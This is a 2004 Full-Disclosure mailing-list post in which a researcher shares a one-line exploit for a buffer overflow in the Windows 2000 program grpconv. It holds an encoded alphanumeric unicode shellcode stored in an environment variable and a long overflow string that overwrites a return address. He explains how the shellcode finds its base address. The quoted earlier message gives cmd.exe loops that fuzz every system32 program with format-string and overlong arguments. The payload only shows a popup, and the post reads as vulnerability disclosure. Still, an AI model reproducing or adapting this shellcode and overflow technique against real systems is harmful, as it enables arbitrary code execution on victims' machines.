Anybody wanna try if this shows a popup ? It's 1 line, if it wraps put it back together: ------------------------------- set !!!!!!=YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLP1WPQT4K10P04KOPLLDKBPMLVMTKBHLH2HRLRLKPKPRH03P2NN1T2H3EBSQURRPT7K2QEWK8KN9X21KPKPKPSYZOTIWUNQYB0RK8MPKPKPM0Q1RLBLMPD9ROSE2RO0S2QQT3QUMP1QBRQUMPQR1U2L2O2NC7O0RTROMPBURSMQKPYXLTKPKPM0R3BKD90LS9RNQURDMPBP3G2N1UQTMPBY2OBUMQKPPR7KZBLLI9JZ9XKQKPKPM0HLQFPWTKQ5OLDKPTKUT8M1YZQB4K22MPKQIZNQI0NQ99OQDKP4DJM1JNP1KOWQ8OMCVLM1XGU5WPSEKFNY9ORUIZ1J4KQJNDKQJKS6TKLLPKDKPZMLKQJKDKKTTKKQYX1OQNKOYPA && %SystemRoot%\system32\grpconv AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ^N^A^N^A------------------------------- Let me know if it works (off-list) and what system you're using. I developed it on win2ken sp4. Tech stuff: The string "^N^A^N^A" at the end should be typed "ctrl+N, ctrl+A, ctrl+N, ctrl+A". It works by installing a unicode shellcode in the environment string "!!!!!!" at 0x00010000. This should alphabetically be the first string so the shellcode should be at 0x0001000e. I overwrite a return address (^N^A=0x0001000e). The unicode shellcode needs to know it's own baseaddress, that's why there's "^N^A" twice: the first one is used to return, the second one is poped of by the shellcode to get the baseaddress.
Cheers, SkyLined ----- Original Message ----- From: "Berend-Jan Wever" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Monday, October 04, 2004 17:39 Subject: [Full-Disclosure] Test your windows OS > Hi all, > > Wanna do a quick test to see if the programmers that wrote your windows operating > system have any clue as to what there doing ? Run these commands from cmd.exe in the > system32 directory: > > for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n > for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type > as much "A"-s as cmd.exe allows on one line.) > > Each command will execute every program in your system32 directory, most of them > will either ignore the parameter or report an error because the parameter doesn't > make sence... But on my win2k system I found 6 programs vulnerable to these very > simple formatsting and BoF tests.... grpconv even gives EIP 0x00410041, can it be > any easier? > > These are not vulnerabilities in itself: you cannot gain access or elevate > priviledges but I just wanted to let you know that these programmers did a sloppy > job. > > Cheers, > SkyLined > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
